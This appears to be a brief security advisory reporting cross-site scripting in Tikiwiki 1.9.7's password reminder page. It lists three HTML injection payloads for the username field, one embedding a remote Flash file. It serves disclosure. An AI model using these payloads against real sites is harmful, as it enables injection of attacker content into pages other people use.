Tikiwiki version 1.9.7 is susceptible to cross site scripting attacks.
54f4b65aef6a4b2e0735af3a6362394b165c0dcb2df3ef8454a03ae909871af1
Tikiwiki
Version: 1.9.7
Example Address
http://example.com/tiki-remind_password.php
Overview:
The following codes can be added to the HTML password page by placing the HTML codes in the user name input box and hitting the "send me my password" button.
Examples:
1.<br><br><b><u>XSS</u></b>
2.<EMBED SRC="http://site.com/xss.swf"
3.<html><fontcolor="Red"><b>Pwned</b></font></html>